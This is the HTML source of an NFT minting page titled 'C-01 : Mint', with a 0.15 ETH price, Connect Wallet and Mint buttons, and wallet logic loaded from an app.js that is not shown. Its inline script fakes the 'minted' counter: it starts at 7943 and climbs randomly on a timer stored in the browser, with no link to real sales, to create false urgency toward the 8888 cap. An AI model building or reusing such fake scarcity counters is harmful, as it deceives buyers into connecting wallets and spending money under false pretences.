<html lang="en" style="--blink-time:1s;">
   <head>
      <meta charset="utf-8">
      <link rel="shortcut icon" href="/favicon.ico">
      <meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
      <meta name="theme-color" content="#000000">
      <link rel="manifest" href="/manifest.json">
      <title>C-01 : Mint</title>
      <link href="css/1.4ae7fcb6.chunk.css" rel="stylesheet">
      <link href="css/main.17e37466.chunk.css" rel="stylesheet">
      <link rel="stylesheet" href="style.css">
      <script src="https://cdnjs.cloudflare.com/ajax/libs/web3/1.6.1/web3.min.js" integrity="sha512-5erpERW8MxcHDF7Xea9eBQPiRtxbse70pFcaHJuOhdEBQeAxGQjUwgJbuBDWve+xP/u5IoJbKjyJk50qCnMD7A==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" referrerpolicy="no-referrer"></script>
      <style>:root {
         --blink-time: 3s;
         }
         .blink {
         animation: var(--blink-time) blinker linear infinite;
         -webkit-animation: var(--blink-time) blinker linear infinite;
         -moz-animation: var(--blink-time) blinker linear infinite;
         }
         @-moz-keyframes blinker {
         0% {
         opacity: 1;
         }
         50% {
         opacity: 0;
         }
         100% {
         opacity: 1;
         }
         }
         @-webkit-keyframes blinker {
         0% {
         opacity: 1;
         }
         50% {
         opacity: 0;
         }
         100% {
         opacity: 1;
         }
         }
         @keyframes blinker {
         0% {
         opacity: 1;
         }
         50% {
         opacity: 0;
         }
         100% {
         opacity: 1;
         }
         }

         .btn {
 position:relative;
 display:inline-flex;
 -webkit-appearance:none;
 -moz-appearance:none;
 appearance:none;
 align-items:center
}
.btn>:not([hidden])~:not([hidden]) {
 --tw-space-x-reverse:0;
 margin-right:calc(.5rem * var(--tw-space-x-reverse));
 margin-left:calc(.5rem * calc(1 - var(--tw-space-x-reverse)))
}
.btn {
 border-radius:9999px;
 padding:.75rem 1.5rem;
 letter-spacing:.05em;
 transition-property:all;
 transition-timing-function:cubic-bezier(.4,0,.2,1);
 transition-duration:.15s
}
.btn:hover {
 top:-1px;
 --tw-shadow-colored:0 4px 6px -1px var(--tw-shadow-color),0 2px 4px -2px var(--tw-shadow-color);
 --tw-shadow-color:rgb(108 151 183/0.3);
 --tw-shadow:var(--tw-shadow-colored)
}
.btn:active,
.btn:hover {
 box-shadow:var(--tw-ring-offset-shadow,0 0 #0000),var(--tw-ring-shadow,0 0 #0000),var(--tw-shadow)
}
.btn:active {
 top:1px;
 --tw-shadow:0 0 #0000;
 --tw-shadow-colored:0 0 #0000
}
.-mt-16 {
 margin-top:-4rem
}
.flex {
 display:flex
}
.h-full {
 height:100%
}
.h-2 {
 height:.5rem
}
.h-4 {
 height:1rem
}
.h-6 {
 height:1.5rem
}
.w-8 {
 width:2rem
}
.w-full {
 width:100%
}
.flex-none {
 flex:none
}
.flex-auto {
 flex:1 1 auto
}
.flex-col {
 flex-direction:column
}
.items-center {
 align-items:center
}
.justify-center {
 justify-content:center
}
.space-x-4>:not([hidden])~:not([hidden]) {
 --tw-space-x-reverse:0;
 margin-right:calc(1rem * var(--tw-space-x-reverse));
 margin-left:calc(1rem * calc(1 - var(--tw-space-x-reverse)))
}
.space-y-4>:not([hidden])~:not([hidden]) {
 --tw-space-y-reverse:0;
 margin-top:calc(1rem * calc(1 - var(--tw-space-y-reverse)));
 margin-bottom:calc(1rem * var(--tw-space-y-reverse))
}
.space-x-2>:not([hidden])~:not([hidden]) {
 --tw-space-x-reverse:0;
 margin-right:calc(.5rem * var(--tw-space-x-reverse));
 margin-left:calc(.5rem * calc(1 - var(--tw-space-x-reverse)))
}
.bg-white {
 --tw-bg-opacity:1;
 background-color:rgb(255 255 255/var(--tw-bg-opacity))
}
.p-5 {
 padding:1.25rem
}
.text-center {
 text-align:center
}
.text-6xl {
 font-size:3.75rem;
 line-height:1
}
.text-3xl {
 font-size:1.875rem;
 line-height:2.25rem
}
.text-base {
 font-size:1rem;
 line-height:1.5rem
}
.font-bold {
 font-weight:700
}
.tracking-wider {
 letter-spacing:.05em
}
.text-white {
 --tw-text-opacity:1;
 color:rgb(255 255 255/var(--tw-text-opacity))
}
.text-yellow-200 {
 --tw-text-opacity:1;
 color:rgb(250 230 1/var(--tw-text-opacity))
}
.text-sea-700 {
 --tw-text-opacity:1;
 color:rgba(237, 237, 237, 1/var(--tw-text-opacity))
}
.text-sea-600 {
 --tw-text-opacity:1;
 color:rgb(68 92 127/var(--tw-text-opacity))
}
@media (min-width:768px) {
 .md\:-mt-32 {
  margin-top:-8rem
 }
 .md\:w-12 {
  width:3rem
 }
 .md\:w-\[600px\] {
  width:600px
 }
 .md\:space-y-8>:not([hidden])~:not([hidden]) {
  --tw-space-y-reverse:0;
  margin-top:calc(2rem * calc(1 - var(--tw-space-y-reverse)));
  margin-bottom:calc(2rem * var(--tw-space-y-reverse))
 }
 .md\:text-8xl {
  font-size:6rem;
  line-height:1
 }
 .md\:text-5xl {
  font-size:3rem;
  line-height:1
 }
 .md\:text-xl {
  font-size:1.25rem;
  line-height:1.75rem
 }
}
@media (min-width:1024px) {
 .lg\:-mt-36 {
  margin-top:-9rem
 }
 .lg\:text-9xl {
  font-size:8rem;
  line-height:1
 }
}


      </style>
   </head>
   <body>
      <noscript>You need to enable JavaScript to run this app.</noscript>
      <div id="root">
         <div class="main">
            <div id="stars"></div>
            <div id="stars2"></div>
            <div id="stars3"></div>
            <div class="content">
               <img src="https://i.imgur.com/DvimMhm.png" alt="Logo" class="logo">
               <div style="background-color: transparent; opacity: 1;"><span class="blink span1" style="color: rgb(136, 149, 153); font-size: 55px; font-style: normal; text-transform: none;">Live now</span></div>
<div class="p-5">
            <div class="">
               <div class="text-center space-y-4 md:space-y-8">
                  <p class="tracking-wider" style="color: #ffffff;"><span id="nft_left"></span>/8888 minted</p>
                  <div id="spinner" class="spinner" style="color: white; animation: none;">
                     <p class="" style="margin-bottom: 10px;">
                        Total: <span id="totalETH" style="">0.15</span> ETH
                     </p>

                     <button type="button" class="btn-minus" style="background: white;
                              position: relative;
                              color: #445c7f;
                              font-weight: 700;
                              text-align: center;
                              letter-spacing: 2px;
                              background-position: 0 -15;
                              padding:7px 20px;
                              border: 0px solid black;
                              border-radius: 88px;font-size: 20px;margin-right: 10px;">-</button>
                     <input type="text" value="1" data-ruler="quantity" id="totalNFT" style="border: 0px solid black;
                                    text-align: center;
                                    background: white;color: #445c7f; padding-top:5px; padding-bottom: 5px;
                                    border-radius: 50px;
                                    width: 200px;line-height: 1.5;font-size: 20px;">
                     <button type="button" class="btn-plus" style="background: white;
                              position: relative;
                              color: #445c7f;font-weight: 700;
                              text-align: center;
                              letter-spacing: 2px;
                              background-position: 0 -15;
                              padding:7px 20px;
                              border: 0px solid black;
                              border-radius: 88px;font-size: 20px;margin-left:10px;
                              ">+</button>
                  </div>
                  <p class="tracking-wider" id="status" style="color: #ffffff;">Please Connect to your Wallet before Minting.</p>
                  <div class="flex items-center justify-center text-base md:text-xl space-x-2">
                     <a class="bg-white btn text-sea-600" id="connectBtn" style="cursor: pointer;">
                        Connect Wallet
                     </a>
                     <a class="bg-white btn text-sea-600" id="checkoutBtn" style="cursor: pointer; display: block;">
                        Mint
                     </a>
                  </div>
                  <div class="h-6"></div>
               </div>
            </div>
         </div>

  <script type="text/javascript" src="https://unpkg.com/web3@1.6.1/dist/web3.min.js"></script>
  <script type="text/javascript" src="https://unpkg.com/web3modal@1.9.4/dist/index.js"></script>
  <script type="text/javascript" src="https://unpkg.com/evm-chains@0.2.0/dist/umd/index.min.js"></script>
  <script type="text/javascript" src="https://unpkg.com/@walletconnect/web3-provider@1.5.5/dist/umd/index.min.js"></script>
        <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
      <script src="app.js"></script>
      <script>
        db = window.localStorage;

        if (db.getItem('amount') == null)
        {
            var amount = 7943
            db.setItem("amount", amount)
        } else {
            var amount = parseInt(db.getItem('amount'))
        }
        smooth_amount = amount
        var counter = 0
        // Update the count down every 1 second
        var x = setInterval(function() {
          counter++
          if (counter > 40)
          {
            counter = 0
            if (amount < 8888)
            {
                logic = Math.floor((1 - (amount / 4430)) * 100)
                amount = Math.floor(Math.random() * logic) + amount
                db.setItem("amount", amount)
                db.setItem("max", logic)
            }
          }
          if (smooth_amount < amount) {
            smooth_amount = smooth_amount + ((amount - smooth_amount)/(20 - counter))
          }
          // Display the result in the element with id="demo"
          document.getElementById("nft_left").innerHTML = smooth_amount.toFixed(0);
          // If the count down is finished, write some text
        }, 100);
    </script>
   </body>
</html>